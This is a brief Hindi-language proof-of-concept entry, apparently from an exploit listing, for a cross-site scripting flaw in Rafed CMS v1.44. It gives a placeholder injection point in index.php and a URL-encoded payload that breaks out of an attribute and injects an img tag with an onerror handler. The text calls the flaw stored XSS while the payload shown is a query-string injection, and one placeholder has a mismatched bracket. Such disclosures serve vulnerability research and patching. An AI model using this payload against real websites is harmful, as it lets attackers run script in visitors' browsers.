
Rafed CMS v1.44 में संग्रहीत XSS भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो index.php पैरामीटर के माध्यम से इंजेक्शन का प्रदर्शन करता है।
Rafed CMS वेबसाइट v1.44 - क्रॉस-साइट स्क्रिप्टिंग (XSS)
index.php?">{XSS_Payload] index.php में
https://localhost/?%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E